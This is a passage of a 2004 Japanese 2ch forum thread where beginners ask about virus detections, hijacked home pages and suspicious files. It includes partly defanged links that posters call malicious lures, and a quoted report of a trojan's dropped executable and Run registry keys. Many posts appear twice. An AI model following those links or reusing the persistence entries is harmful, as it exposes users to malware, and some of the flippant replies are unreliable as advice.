CmdLineExt03.dllがインスコされた時間と同時刻にLocal Settingsに
SIntfNT.dll、SIntf32.dll、SIntf16.dllがインスコされてた
これSecuRomのファイルみたいだけどCmdLineExt03.dllはなんだか分からん
SIntfNT.dll、SIntf32.dll、SIntf16.dllがインスコされてた
これSecuRomのファイルみたいだけどCmdLineExt03.dllはなんだか分からん
GTA3vicecity起動インスコされるようだな
今までインスコされること無かったのになんで急にインスコするようになったんだろう
今までインスコされること無かったのになんで急にインスコするようになったんだろう
373 :名無しさん@お腹いっぱい。:04/09/20 22:18:04
w2kで、起動時にデスクトップの中心に
fRf"f^fNfg
と書かれたダイアログが出ます。右上に最小化/最大化/閉じるボタンもついてないただの四角の上にかかれてます
クリックすると消えるんですがタスクマネージャで見ても変わった名前のプロセスはありません。
ウイルスか何かでしょうか?
fRf"f^fNfg
と書かれたダイアログが出ます。右上に最小化/最大化/閉じるボタンもついてないただの四角の上にかかれてます
クリックすると消えるんですがタスクマネージャで見ても変わった名前のプロセスはありません。
ウイルスか何かでしょうか?
374 :名無しさん@お腹いっぱい。:04/09/20 22:26:54
375 :名無しさん@お腹いっぱい。:04/09/20 22:43:03
376 :名無しさん@お腹いっぱい。:04/09/21 00:07:38
>>375
asynmgr.exeのミスタイプじゃない?
これだったらマカフィーのexeかもしれないからマカフィーが
何かの拍子でイカれたのかも・・・
とりあえず一度マカフィー再インスコしてみてちょ
vsynmgr.exeであってるとしたらこいつが何か調べるためにもこのexeのパス、同じフォルダ中にある他のファイル
と作成日時に違いがないか調べてみて。
あとはセキュリティーソフトの機能を停止させるウイルスがいる可能性もあるから
ファイル名を指定して実行→msconfigでスタートアップに登録されているexeで
怪しいのがないかチェック
あとregeditでHKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\open\command
の値が"%1" %* になってるかチェック
asynmgr.exeのミスタイプじゃない?
これだったらマカフィーのexeかもしれないからマカフィーが
何かの拍子でイカれたのかも・・・
とりあえず一度マカフィー再インスコしてみてちょ
vsynmgr.exeであってるとしたらこいつが何か調べるためにもこのexeのパス、同じフォルダ中にある他のファイル
と作成日時に違いがないか調べてみて。
あとはセキュリティーソフトの機能を停止させるウイルスがいる可能性もあるから
ファイル名を指定して実行→msconfigでスタートアップに登録されているexeで
怪しいのがないかチェック
あとregeditでHKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\open\command
の値が"%1" %* になってるかチェック
>>366
サンクスコです
>>368
サンクスコです。
NISは入れてあるのですが
なんとなく気まぐれでオンラインスキャンをかけてみた所
上記のモノが出てきました。
NISではひっかからなかったので気になって質問しました。
>>369
>>7を見てみましたが どの記載が適してるのか不明だったので
こちらでも質問しました。
>>7のどこに答えがありますか?
サンクスコです
>>368
サンクスコです。
NISは入れてあるのですが
なんとなく気まぐれでオンラインスキャンをかけてみた所
上記のモノが出てきました。
NISではひっかからなかったので気になって質問しました。
>>369
>>7を見てみましたが どの記載が適してるのか不明だったので
こちらでも質問しました。
>>7のどこに答えがありますか?
378 :名無しさん@お腹いっぱい。:04/09/21 00:27:17
379 :http://pc5.2ch.net/test/read.cgi/sec/1095637802/16:04/09/21 00:35:30
>377
俺は誘導してないよ。
レス番打ってやっただろう。
お前は>>7 のリンク先全部読んで日本語の勉強し直せ。
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/1-4
俺は誘導してないよ。
レス番打ってやっただろう。
お前は>>7 のリンク先全部読んで日本語の勉強し直せ。
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/1-4
>>376
レスさんくすです。
avsynmgrの打ち間違いでした。
マカフィーは元々入っていた奴なんで、アンインストールしたら返って面倒な気がする・・・
regeditは値は指摘した通りのものになっています。
あと、OLEのアドレス帳には自分のアドレスしか入っていないんですが、
(使用するものはメール鯖に入ってる。友達が居ないわけではないです)ウィルスメールは来ていません。
壊れただけかなぁ・・・
レスさんくすです。
avsynmgrの打ち間違いでした。
マカフィーは元々入っていた奴なんで、アンインストールしたら返って面倒な気がする・・・
regeditは値は指摘した通りのものになっています。
あと、OLEのアドレス帳には自分のアドレスしか入っていないんですが、
(使用するものはメール鯖に入ってる。友達が居ないわけではないです)ウィルスメールは来ていません。
壊れただけかなぁ・・・
381 :名無しさん@お腹いっぱい。:04/09/21 04:21:19
マカフィーのせいでうちはPCあぼーんしたよ
期限すぎて更新したとたんにっちもさっちもぶるどっく
期限すぎて更新したとたんにっちもさっちもぶるどっく
382 :名無しさん@お腹いっぱい。:04/09/21 04:36:38
383 :名無しさん@お腹いっぱい。:04/09/21 07:05:04
こんな事する馬鹿がいるからここの評判落ちるんじゃん。
ハァァ。。。
ハァァ。。。
384 :名無しさん@お腹いっぱい。:04/09/21 07:10:49
「ストーカー(粘着野郎)に共通する特徴」
http://gb.bbs.ws/book.php?book=gall1
・初対面の人にも「自分史」を話したがる
・筆まめ
・電話魔
・人によくカマをかける
・親しくも無いのに高価なプレゼントを贈る
・他人への評価が極端に変わりやすい
・敵・味方を区別したがる
・怒り出すと止まらない
・人並み以上に情報に敏感
・複数以上の仕事を同時にこなせる
・拒絶・拒否を受け入れる事ができない、自己中心的
・自分の弱点や劣等感を感じていても、自分で認めようとしない
・何かと周りのせいにして言い訳ばかり
・大人になりきれない幼児性
・最初は、優しくて場合によっては魅力的
http://gb.bbs.ws/book.php?book=gall1
・初対面の人にも「自分史」を話したがる
・筆まめ
・電話魔
・人によくカマをかける
・親しくも無いのに高価なプレゼントを贈る
・他人への評価が極端に変わりやすい
・敵・味方を区別したがる
・怒り出すと止まらない
・人並み以上に情報に敏感
・複数以上の仕事を同時にこなせる
・拒絶・拒否を受け入れる事ができない、自己中心的
・自分の弱点や劣等感を感じていても、自分で認めようとしない
・何かと周りのせいにして言い訳ばかり
・大人になりきれない幼児性
・最初は、優しくて場合によっては魅力的
385 :名無しさん@お腹いっぱい。:04/09/21 07:38:48
avast!4スレから、スレ違いの指摘を受けて来ました。
このソフトはかなり好きで、正式に日本語化する前から愛用しています。
しかし、ここでトラブル発生。
未だもって、「プロキシサーバ」というものの概念がわからない厨なんですが、
POP/SMTPサーバにはローカルの、127.0.0.1 を置いて使用していたのですが、
新たに、SPAM対策として、SpamDump というシェアウエアを導入しました。
が、このソフトもローカルの、127.0.0.1をそれぞれ必要とする、ということで、
重複している状態です。
ヘルプマニュアルにもそれにあたるらしきところは無く、どのように共存してい
ったら良いものか・・ネットワーク関連はほとんど分からなくて、ここにたどり着
きました。
教えてえらい人!!
このソフトはかなり好きで、正式に日本語化する前から愛用しています。
しかし、ここでトラブル発生。
未だもって、「プロキシサーバ」というものの概念がわからない厨なんですが、
POP/SMTPサーバにはローカルの、127.0.0.1 を置いて使用していたのですが、
新たに、SPAM対策として、SpamDump というシェアウエアを導入しました。
が、このソフトもローカルの、127.0.0.1をそれぞれ必要とする、ということで、
重複している状態です。
ヘルプマニュアルにもそれにあたるらしきところは無く、どのように共存してい
ったら良いものか・・ネットワーク関連はほとんど分からなくて、ここにたどり着
きました。
教えてえらい人!!
386 :名無しさん@お腹いっぱい。:04/09/21 08:36:38
>>385
使えません
使えません
387 :名無しさん@お腹いっぱい。:04/09/21 12:19:32
388 :名無しさん@お腹いっぱい。:04/09/21 13:39:05
>382
じゃあお前が答えてやれよ
じゃあお前が答えてやれよ
389 :名無しさん@お腹いっぱい。:04/09/21 13:49:59
始めまして 質問なんですがウイルススキャンしたらPE.parite.Aというのが大量に表示されたんですが・・どうしたらいいのでしょう?
390 :名無しさん@お腹いっぱい。:04/09/21 14:02:17
391 :名無しさん@お腹いっぱい。:04/09/21 15:25:10
>389
そんなあなたに>85-86
そんなあなたに>85-86
392 :名無しさん@お腹いっぱい。:04/09/21 15:29:47
トロイの木馬ってなに?
やばいの?
やばいの?
393 :名無しさん@お腹いっぱい。:04/09/21 15:50:42
文章が読めないから初心者というんだな
394 :名無しさん@お腹いっぱい。:04/09/21 15:57:39
>>392
三角木馬みたいなもんだ。気にするな。
三角木馬みたいなもんだ。気にするな。
395 :名無しさん@お腹いっぱい。:04/09/21 17:49:06
>>392
気にしすぎるとシュリーマンのような嘘つきになる
気にしすぎるとシュリーマンのような嘘つきになる
396 :名無しさん@お腹いっぱい。:04/09/22 02:42:33
N速で下のjpg踏んじゃったんだけど
tp://white.jpg-gif.net/bbsx/1/img/110153.jpg
>そのjpgはトロイの木馬系の亜種ウイルスでワクチンがない
>(名称)
>アングラ俗称で正式名はまだない
>ipeg_troj2174
>(特徴)
>1時間以上パソコンにあるとjpgからトロイ木馬がハードディスクに寄生する。
>30分毎にレジストリー情報を送信する
>寄生したあとは普通のjpgだから見てもどうもない
>貼り付けた人は危険
>(除去方法)
>なし。ハードディスクを初期化するしかない
これ本当でしょうか?XPのSP1のセキュリティホール狙った奴なんでしょうか?
tp://white.jpg-gif.net/bbsx/1/img/110153.jpg
>そのjpgはトロイの木馬系の亜種ウイルスでワクチンがない
>(名称)
>アングラ俗称で正式名はまだない
>ipeg_troj2174
>(特徴)
>1時間以上パソコンにあるとjpgからトロイ木馬がハードディスクに寄生する。
>30分毎にレジストリー情報を送信する
>寄生したあとは普通のjpgだから見てもどうもない
>貼り付けた人は危険
>(除去方法)
>なし。ハードディスクを初期化するしかない
これ本当でしょうか?XPのSP1のセキュリティホール狙った奴なんでしょうか?
397 :名無しさん@お腹いっぱい。:04/09/22 06:35:19
>>396
俺の推測だがそれは嘘だろ。何もないはず。
まずそんなウイルス聞いたことがない。
>そのjpgはトロイの木馬系の亜種ウイルスでワクチンがない
トロイの木馬系亜種って何だ? netsky(ウイルス名)の亜種とかならわかるけど
>1時間以上パソコンにあるとjpgからトロイ木馬がハードディスクに寄生する。
ハードディスクに寄生するなんて無理
>寄生したあとは普通のjpgだから見てもどうもない
最初からどうもないjpg
あ〜なんでこんな時間まで起きてるんだろう なぜなら厨だから
ウイルスの情報載せた厨を信じるか 平日のこんな時間まで起きている厨を信じるかは自由だが・・・・
俺の推測だがそれは嘘だろ。何もないはず。
まずそんなウイルス聞いたことがない。
>そのjpgはトロイの木馬系の亜種ウイルスでワクチンがない
トロイの木馬系亜種って何だ? netsky(ウイルス名)の亜種とかならわかるけど
>1時間以上パソコンにあるとjpgからトロイ木馬がハードディスクに寄生する。
ハードディスクに寄生するなんて無理
>寄生したあとは普通のjpgだから見てもどうもない
最初からどうもないjpg
あ〜なんでこんな時間まで起きてるんだろう なぜなら厨だから
ウイルスの情報載せた厨を信じるか 平日のこんな時間まで起きている厨を信じるかは自由だが・・・・
398 :名無しさん@お腹いっぱい。:04/09/22 14:47:34
DLしたZip開いたらALEScan.exeっていうやばそうなファイルが入ってたんで速攻消してみました。
その後ぐぐったらBackdoor関連のセキュリティーページ(国外)が出てきたので
かなり不安になったのですが、実行してなければ大丈夫なんでしょうか?
その後ぐぐったらBackdoor関連のセキュリティーページ(国外)が出てきたので
かなり不安になったのですが、実行してなければ大丈夫なんでしょうか?
399 :名無しさん@お腹いっぱい。:04/09/22 15:19:32
毒入りりんごを持っててもなんの害もないだろ
喰わなければ問題なし
喰わなければ問題なし
400 :名無しさん@お腹いっぱい。:04/09/22 15:27:29
>>398
手遅れ
手遅れ
401 :名無しさん@お腹いっぱい。:04/09/22 15:56:08
402 :名無しさん@お腹いっぱい。:04/09/22 15:56:20
403 :名無しさん@お腹いっぱい。:04/09/22 16:02:35
404 :名無しさん@お腹いっぱい。:04/09/22 16:05:53
でもこれRAM補助ツールですよね・・・
しかしこんなの入れた覚えは・・・
しかしこんなの入れた覚えは・・・
405 :名無しさん@お腹いっぱい。:04/09/22 16:20:28
もうだめぽ
再インスコするしかないぽ
再インスコするしかないぽ
406 :名無しさん@お腹いっぱい。:04/09/22 16:25:32
事故解決しました
407 :名無しさん@お腹いっぱい。:04/09/22 17:05:38
とりやえず再起動しても表面上は問題なし。
裏でヤラレてるかも知んないけど。。。(´・ω・`)
どーでもいいんだけどこのスレ宙が多いのは仕様ですか?
てっきりセキュリティーの専門家とか質問に来た素人だけが来てる板かと思ってた。
質問スレがこの有様だからねぇ。
>>401-402 サンクス。何かあったらまた質問しにきます。
裏でヤラレてるかも知んないけど。。。(´・ω・`)
どーでもいいんだけどこのスレ宙が多いのは仕様ですか?
てっきりセキュリティーの専門家とか質問に来た素人だけが来てる板かと思ってた。
質問スレがこの有様だからねぇ。
>>401-402 サンクス。何かあったらまた質問しにきます。
408 :名無しさん@お腹いっぱい。:04/09/22 17:08:09
と、sageることができない宙(厨のことか?)が申しております
409 :名無しさん@お腹いっぱい。:04/09/22 17:09:36
>>407
ダウソ宙は二度と来るな
ダウソ宙は二度と来るな
410 :名無しさん@お腹いっぱい。:04/09/22 17:27:05
テンプレすら読まない輩に対してつっけんどんな対応をするのは仕様です
411 :名無しさん@お腹いっぱい。:04/09/22 18:05:08
はじめまして、
IEのホームがクール何とかになってしまうウイルスにかかってしまいました。
オンラインチェックで引っかかったファイルはすべて消したのですが
それでもホーム設定のところは直りません。
どうしたら良いもんでしょうか、、、orz
IEのホームがクール何とかになってしまうウイルスにかかってしまいました。
オンラインチェックで引っかかったファイルはすべて消したのですが
それでもホーム設定のところは直りません。
どうしたら良いもんでしょうか、、、orz
412 :名無しさん@お腹いっぱい。:04/09/22 18:13:54
感染するとデスクトップの絵をうpロダにあげて、
それへのリンクを 2ch の特定スレに自動書き込みするウィルスはやってる?
やられているスレ
角二 【うpろだ】アップローダー案内所11【アプロダ】
http://idol.bbspink.com/test/read.cgi/ascii2d/1095176627/
それへのリンクを 2ch の特定スレに自動書き込みするウィルスはやってる?
やられているスレ
角二 【うpろだ】アップローダー案内所11【アプロダ】
http://idol.bbspink.com/test/read.cgi/ascii2d/1095176627/
413 :名無しさん@お腹いっぱい。:04/09/22 18:26:31
414 :名無しさん@お腹いっぱい。:04/09/22 18:48:42
>>411
新スレ立ったなぁ。
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレよく読んで実行して、それでもわからなかったら質問汁。
新スレ立ったなぁ。
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレよく読んで実行して、それでもわからなかったら質問汁。
415 :名無しさん@お腹いっぱい。:04/09/22 18:53:05
>>413-414
ありがとうございました。見てみます
ありがとうございました。見てみます
書いてあるとおりに試してみました。
ダイヤラーなどは出なくなったのですが、
ホーム設定だけは何度やっても
IE再起動すると同じサイトになってしまいます。
どなたかお助けください、、、
ダイヤラーなどは出なくなったのですが、
ホーム設定だけは何度やっても
IE再起動すると同じサイトになってしまいます。
どなたかお助けください、、、
417 :名無しさん@お腹いっぱい。:04/09/22 19:33:31
418 :名無しさん@お腹いっぱい。:04/09/22 19:36:58
馬鹿なことしてW32/Bereb-Bというウイルスに感染してしまったんですが
ノートンの体験版で修復しようとしても このファイルを修復できません ファイルへのアクセスが拒否されました と表示されて
何もできないんですがどうすればいいですか?
ノートンの体験版で修復しようとしても このファイルを修復できません ファイルへのアクセスが拒否されました と表示されて
何もできないんですがどうすればいいですか?
419 :名無しさん@お腹いっぱい。:04/09/22 19:37:57
>>415
CWShredderでぐぐれ
CWShredderでぐぐれ
420 :名無しさん@お腹いっぱい。:04/09/22 19:39:13
>>418
起動FDから立ち上げてDOSコマンドで消す
起動FDから立ち上げてDOSコマンドで消す
421 :名無しさん@お腹いっぱい。:04/09/22 19:48:57
>>416
何をどこまでやったのか書かんと、わからんよ。
あと、質問汁と言ったのは向こうのスレでって事。
今、優秀な(?)質問者がいて、回答者が気分よくなってる
ところだから、テンプレもロクにやらんで質問しても叩かれる
だけだとは思うが・・・。
何をどこまでやったのか書かんと、わからんよ。
あと、質問汁と言ったのは向こうのスレでって事。
今、優秀な(?)質問者がいて、回答者が気分よくなってる
ところだから、テンプレもロクにやらんで質問しても叩かれる
だけだとは思うが・・・。
422 :名無しさん@お腹いっぱい。:04/09/22 20:02:49
>>396
亀レスだけど一応
少なくともgdiplus.dllの脆弱性(MS04-028)をついたものではない
1)JPEG中に問題を引き起こすバイトシーケンスがない
2)問題のあるJPEGを検出したVB2004でスキャンしても何も検出されない
他のウィルス対策ソフトでスキャンしても特に異常はないし
そもそもサイズからいって悪質なネタと考えるべき
参考
ttp://lists.netsys.com/pipermail/full-disclosure/2004-September/026454.html
亀レスだけど一応
少なくともgdiplus.dllの脆弱性(MS04-028)をついたものではない
1)JPEG中に問題を引き起こすバイトシーケンスがない
2)問題のあるJPEGを検出したVB2004でスキャンしても何も検出されない
他のウィルス対策ソフトでスキャンしても特に異常はないし
そもそもサイズからいって悪質なネタと考えるべき
参考
ttp://lists.netsys.com/pipermail/full-disclosure/2004-September/026454.html
424 :名無しさん@お腹いっぱい。:04/09/22 20:49:56
あるアプリを実行したら壁紙を変えられてしまったのですがどうすれば直せるのでしょうか?
425 :名無しさん@お腹いっぱい。:04/09/22 20:50:45
失意登?失意昇?
426 :名無しさん@お腹いっぱい。:04/09/22 20:56:33
今日はZoneAlerm先生がやけに反応するんですが、なにか新しいワームでも流行ってるんですか?
NetBios、Port135、Port1433、Port445あたりが攻撃されるんですが。
NetBios、Port135、Port1433、Port445あたりが攻撃されるんですが。
427 :名無しさん@お腹いっぱい。:04/09/22 20:58:45
428 :名無しさん@お腹いっぱい。:04/09/22 21:01:21
429 :名無しさん@お腹いっぱい。:04/09/22 21:03:19
>>424
ny関連はお引き取りください
ny関連はお引き取りください
430 :名無しさん@お腹いっぱい。:04/09/22 21:03:55
431 :名無しさん@お腹いっぱい。:04/09/22 21:04:18
>>424
通報しました
通報しました
432 :名無しさん@お腹いっぱい。:04/09/22 21:44:41
>>412
169 :名無したん(;´Д`)ハァハァ :04/09/22 21:39:41 ID:LP+Ly6X1
23 :名無しさん@ゴーゴーゴーゴー! :04/09/22 21:37:54 ID:kcrfEebX
実行結果:
追加されるファイル:
windows\shellsystem.exe 678kB
追加されるレジストリ:
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
169 :名無したん(;´Д`)ハァハァ :04/09/22 21:39:41 ID:LP+Ly6X1
23 :名無しさん@ゴーゴーゴーゴー! :04/09/22 21:37:54 ID:kcrfEebX
実行結果:
追加されるファイル:
windows\shellsystem.exe 678kB
追加されるレジストリ:
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
433 :名無しさん@お腹いっぱい。:04/09/22 21:58:11
何か苺は甘いでウイルスが流行っているんですか?
ttp://up.isp.2ch.net/upload/c=03okari/index.cgi
ttp://up.isp.2ch.net/upload/c=03okari/index.cgi
434 :名無しさん@お腹いっぱい。:04/09/22 22:07:32
私は苺で違法ダウンロードばかりしている犯罪者です
http://news13.2ch.net/test/read.cgi/news/1095854900/
【洒落】キンタマウィルスのWeb版
http://news13.2ch.net/test/read.cgi/news/1095858175/
http://news13.2ch.net/test/read.cgi/news/1095854900/
【洒落】キンタマウィルスのWeb版
http://news13.2ch.net/test/read.cgi/news/1095858175/
435 :名無しさん@お腹いっぱい。:04/09/22 22:35:21
【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 Norton Antivirus
【ちゃんとUpdateしてるか】 してるみたい
【スキャンした結果(ウイルス名・発見場所)】 W32.HLLW.Rircなど
C:\DOCUMENTS AND SETTINGS\ALL USERS\の中
【別のオンラインスキャンしたならその結果は】
スキャンすると感染が見つからなかったor別のウイルスの名前が出る
【症状を具体的に、分かる限りすべて書く】
いきなりNortonのダイアログが出て「ウイルスを検出しました」と出る
またその時どんなウイルスでも必ず「ファイルを修復できません」「ファイルへのアクセスが拒否されました」となる
また最近IEの画面が出にくくなった
【何をしたらそんなことになったのか】 普通に常時接続で
【これまでにとった措置】
【その他の質問】
これは感染しているのか、単なる2ch上でウイルスコードを書くだけのいたずらなのか
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 Norton Antivirus
【ちゃんとUpdateしてるか】 してるみたい
【スキャンした結果(ウイルス名・発見場所)】 W32.HLLW.Rircなど
C:\DOCUMENTS AND SETTINGS\ALL USERS\の中
【別のオンラインスキャンしたならその結果は】
スキャンすると感染が見つからなかったor別のウイルスの名前が出る
【症状を具体的に、分かる限りすべて書く】
いきなりNortonのダイアログが出て「ウイルスを検出しました」と出る
またその時どんなウイルスでも必ず「ファイルを修復できません」「ファイルへのアクセスが拒否されました」となる
また最近IEの画面が出にくくなった
【何をしたらそんなことになったのか】 普通に常時接続で
【これまでにとった措置】
【その他の質問】
これは感染しているのか、単なる2ch上でウイルスコードを書くだけのいたずらなのか
436 :名無しさん@お腹いっぱい。:04/09/22 23:08:17
>435
ttp://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.rirc.html
まずはここのremoval instructions以降を見て対処
そんでもっかい全ファイルのスキャンをやってみれ
ttp://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.rirc.html
まずはここのremoval instructions以降を見て対処
そんでもっかい全ファイルのスキャンをやってみれ
437 :名無しさん@お腹いっぱい。:04/09/23 00:01:19
529 名前:AA略 ◆.AwAwARK.Y [sage] 投稿日:04/09/22 21:00:08 ID:???
2ちゃんのあるスレでデスクトップの画像をキャプされてうpろだに自動うp→スレに書き込みが
されるexeが出てきたね。
zipなりを解凍して(写真集) (ロリータ)〜みたいなフォルダ(実際にはフォルダのアイコンのexe)
がでてきたらご注意を
535 名前: 〜ヽ ノ ◆25P/xaaPnk [sage] 投稿日:04/09/22 21:36:20 ID:???
exe3つの奴って、軽いきんたまって感じですね。
Regedit開ける知識があれば大した事はないですけど。
536 名前:名無しさん?[sage] 投稿日:04/09/22 21:43:38 ID:???
本スレ721危険
エディタで見たら“This program must be run under Win32”って文字列あり
“アイコン”は、フォルダだけど「フォルダオプション」→表示→すべてのファイルとフォルダ
にチェックマーク入っていないと.exeの拡張子が見えない。
要するに、かっこうは、フォルダだけど、実際は、ぁゃιぃexe
まぁ踏むのは(踏んだのは)自己責任だけど、気を付けて・・・3個ともに!
537 名前:名無しさん?[sage] 投稿日:04/09/22 22:13:46 ID:???
「苺きんたま」だそうです(w
2ちゃんのあるスレでデスクトップの画像をキャプされてうpろだに自動うp→スレに書き込みが
されるexeが出てきたね。
zipなりを解凍して(写真集) (ロリータ)〜みたいなフォルダ(実際にはフォルダのアイコンのexe)
がでてきたらご注意を
535 名前: 〜ヽ ノ ◆25P/xaaPnk [sage] 投稿日:04/09/22 21:36:20 ID:???
exe3つの奴って、軽いきんたまって感じですね。
Regedit開ける知識があれば大した事はないですけど。
536 名前:名無しさん?[sage] 投稿日:04/09/22 21:43:38 ID:???
本スレ721危険
エディタで見たら“This program must be run under Win32”って文字列あり
“アイコン”は、フォルダだけど「フォルダオプション」→表示→すべてのファイルとフォルダ
にチェックマーク入っていないと.exeの拡張子が見えない。
要するに、かっこうは、フォルダだけど、実際は、ぁゃιぃexe
まぁ踏むのは(踏んだのは)自己責任だけど、気を付けて・・・3個ともに!
537 名前:名無しさん?[sage] 投稿日:04/09/22 22:13:46 ID:???
「苺きんたま」だそうです(w
438 :名無しさん@お腹いっぱい。:04/09/23 00:11:45
ゲームとかをしてると突然電源が落ちるのですが、一体どうなっているんでしょうか?
友人に聴いてもお手上げ状態です。
心当たりは
//with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
このファイルを踏んだらウインドが閉じれなくなり、
何かをインストールする画面も消せなかったので強制終了させました。
友人に聴いてもお手上げ状態です。
心当たりは
//with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
このファイルを踏んだらウインドが閉じれなくなり、
何かをインストールする画面も消せなかったので強制終了させました。
439 :名無しさん@お腹いっぱい。:04/09/23 00:19:57
440 :名無しさん@お腹いっぱい。:04/09/23 00:30:06
【使用OS、WindowsUpdateの有無】XP HOME
【使用AntiVirus、Updateの有無】ウイルスバスター している
【スキャンした結果(ウイルス名・発見場所)】異状なし
【症状】ゲームとかをしてると突然電源が落ちます。
サイトなどを見ている分には電源は落ちません。
心当たりは
//with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
このファイルを踏んだらウインドが閉じれなくなり、
何かをインストールする画面も消せなかったので強制終了させました。
【これまでにとった措置】AD-awareとウイルスバスターのスキャン
【使用AntiVirus、Updateの有無】ウイルスバスター している
【スキャンした結果(ウイルス名・発見場所)】異状なし
【症状】ゲームとかをしてると突然電源が落ちます。
サイトなどを見ている分には電源は落ちません。
心当たりは
//with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
このファイルを踏んだらウインドが閉じれなくなり、
何かをインストールする画面も消せなかったので強制終了させました。
【これまでにとった措置】AD-awareとウイルスバスターのスキャン
441 :名無しさん@お腹いっぱい。:04/09/23 01:07:48
>>7
壁紙が蓮になるウィルスって嫌だな(w
壁紙が蓮になるウィルスって嫌だな(w
442 :名無しさん@お腹いっぱい。:04/09/23 01:17:10
>>440
最悪ウィルス・スパイウェアてんこ盛りな悪寒
まずここ行って 熟読してHackerDefenderが入れられた無いか確かめろ。
ttp://higaitaisaku.web.infoseek.co.jp/removehacdef.html
そのうえでもう一度、ウイルス、スパイウェアのスキャン汁
(Ad-awareだけじゃなくSpybotも入れといた方がイイ)
それと>>438のアドは危険、絶対踏むな。
(jpgに偽装したhtmlファイル)
最悪ウィルス・スパイウェアてんこ盛りな悪寒
まずここ行って 熟読してHackerDefenderが入れられた無いか確かめろ。
ttp://higaitaisaku.web.infoseek.co.jp/removehacdef.html
そのうえでもう一度、ウイルス、スパイウェアのスキャン汁
(Ad-awareだけじゃなくSpybotも入れといた方がイイ)
それと>>438のアドは危険、絶対踏むな。
(jpgに偽装したhtmlファイル)
443 :名無しさん@お腹いっぱい。:04/09/23 01:25:34
そういや「shellsystem.exeが接続しようとしているんですけど、これって何?」とか
質問していた奴がこの板にいたような。
あれ新種のきんたまウイルスだったのか。
質問していた奴がこの板にいたような。
あれ新種のきんたまウイルスだったのか。
444 :名無しさん@お腹いっぱい。:04/09/23 01:55:57
苺はウィルスとは言えないなぁ。分類するならトロイだな。
445 :名無しさん@お腹いっぱい。:04/09/23 03:58:14
これウィルスチェックで検出されるの?ノートンとかVB2004とかで。
446 :名無しさん@お腹いっぱい。:04/09/23 04:14:18
>>445
まだ対応されてない
まだ対応されてない
447 :名無しさん@お腹いっぱい。:04/09/23 06:03:25
nyじゃないがDL板逝きだな
448 :名無しさん@お腹いっぱい。:04/09/23 06:19:11
さっきいきなりクイック起動のアイコン全てとmydocumentの中身全てと
デスクトップのよく使うアイコンが消えたんですが
これってトロイか何かでしょうか?
デスクトップのよく使うアイコンが消えたんですが
これってトロイか何かでしょうか?
449 :名無しさん@お腹いっぱい。:04/09/23 06:52:42
2chを潰すためのウイルス。
面白そうだな。
面白そうだな。
450 :名無しさん@お腹いっぱい。:04/09/23 08:43:25
http://news18.2ch.net/test/read.cgi/mnewsplus/1095858867/951
http://news18.2ch.net/test/read.cgi/mnewsplus/1095858867/976-978
このレスを見て疑問に思ったんですがzipファイルを解凍しただけで
ウイルスに感染する、あるいはPCがおかしくなるなんてあるんでしょうか?
http://news18.2ch.net/test/read.cgi/mnewsplus/1095858867/976-978
このレスを見て疑問に思ったんですがzipファイルを解凍しただけで
ウイルスに感染する、あるいはPCがおかしくなるなんてあるんでしょうか?
451 :450:04/09/23 09:08:27
すいません。自己解決しました。
http://internet.watch.impress.co.jp/cda/special/2004/08/19/4290.html
この記事読む限りどうやらあるようですね。勉強不足でした。
http://internet.watch.impress.co.jp/cda/special/2004/08/19/4290.html
この記事読む限りどうやらあるようですね。勉強不足でした。
452 :名無しさん@お腹いっぱい。:04/09/23 11:44:39
すみません、質問させてもらいます。
ウイルスチェックしたところ、
secure.htmlにJS_STARTPAG.AD感染、
secure32.txtにJS_STARTPAG.AD感染、
toolbar.exeにTROJ_SMALL.AJ感染してました。
対応を見たところ、検出されたファイルは削除してしまって良いと書いてありますが、
削除してしまったらやばそうな感じがします。secure32.txtはsystem32に置いてありますし。
これって削除してしまって良いのでしょうか?
ウイルスチェックしたところ、
secure.htmlにJS_STARTPAG.AD感染、
secure32.txtにJS_STARTPAG.AD感染、
toolbar.exeにTROJ_SMALL.AJ感染してました。
対応を見たところ、検出されたファイルは削除してしまって良いと書いてありますが、
削除してしまったらやばそうな感じがします。secure32.txtはsystem32に置いてありますし。
これって削除してしまって良いのでしょうか?
453 :名無しさん@お腹いっぱい。:04/09/23 11:50:46
またエロか
454 :名無しさん@お腹いっぱい。:04/09/23 12:02:22
>>452
さっさと削除しろ。
さっさと削除しろ。
455 :名無しさん@お腹いっぱい。:04/09/23 12:12:03
苺金玉に感染したか否かを調べる方法を教えて下さい。
昨日の夜中に、金玉アドレスを踏んだような、踏んでないような。
JAVAONで、HTMLなら、自らEXEを実行してなくても、勝手に実行している可能性ってあるんですよね?
昨日の夜中に、金玉アドレスを踏んだような、踏んでないような。
JAVAONで、HTMLなら、自らEXEを実行してなくても、勝手に実行している可能性ってあるんですよね?
456 :名無しさん@お腹いっぱい。:04/09/23 12:14:34
457 :名無しさん@お腹いっぱい。:04/09/23 12:28:19
458 :名無しさん@お腹いっぱい。:04/09/23 12:47:09
459 :名無しさん@お腹いっぱい。:04/09/23 13:40:50
windowsフォルダ内に
$NtUninstallQ{何かの数字が入ってる}$
というフォルダがいくつもあるんですが
これはウィルスですか?
あともう一つ
windowsフォルダ内にtwain_32 というフォルダがあるんですが、
ウィルスですか?
教えてください。お願いします。
$NtUninstallQ{何かの数字が入ってる}$
というフォルダがいくつもあるんですが
